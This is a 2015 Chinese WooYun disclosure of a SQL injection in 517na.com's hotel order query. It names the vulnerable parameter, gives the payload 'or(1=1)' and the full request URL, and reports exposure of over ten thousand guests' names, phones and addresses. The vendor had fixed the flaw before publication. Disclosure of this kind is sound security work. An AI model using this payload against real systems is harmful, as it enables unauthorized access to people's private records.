当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093141

漏洞标题:四川我要去哪517旅行网某处SQL注入导致数万酒店开房信息泄露(入住人姓名、手机、酒店地址、入住时间等)

相关厂商:517na.com

漏洞作者: Jim叔叔

提交时间:2015-01-21 15:21

修复时间:2015-01-22 08:58

公开时间:2015-01-22 08:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-01-21: 细节已通知厂商并且等待厂商处理中
2015-01-22: 厂商已经确认,细节仅向厂商公开
2015-01-22: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

今天你开房了吗?

详细说明:

注入点存在于:酒店预订中心-》订单查询(http://jd.517na.com)
在查询时会调用如下接口:
http://jd.517na.com/HotelOrder/OrderQuery?txtOrderKeyId=&txtStartDate=2014-12-21&txtEndDate=2015-01-21&txtGuestName=&ddlOrderFlag=1&ddlOrderStatus=0&txtBuyerStatffId=
其中ddlOrderStatus参数可以注入。
注入payload:ddlOrderStatus=0 or(1=1) or(1=1)
http://jd.517na.com/HotelOrder/OrderQuery?txtOrderKeyId=&txtStartDate=2013-10-01&txtEndDate=2015-01-21&txtGuestName=&ddlOrderFlag=1&ddlOrderStatus=0 or(1=1) or(1=1)&txtBuyerStatffId=
从2013-10-01到2015-01-21国内酒店订单有1万多条:

1.png


可以执行支付、查看详情、取消订单等操作!!!

2.png


详情里面有入住人姓名、人数、手机、入住时间、酒店地址、邮寄地址等:

3.png

漏洞证明:

2.png


3.png

修复方案:

try{
//…...
int n=Convert.ToInt32(Request.QueryString["SelectStatus"]);
//......
}catch(Exception ex){
Response.Write("送一个返程的机票可好。。。");
}

版权声明:转载请注明来源 Jim叔叔@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-01-22 08:53

厂商回复:

感谢Jim叔叔对517的关注

最新状态:

2015-01-22:已修复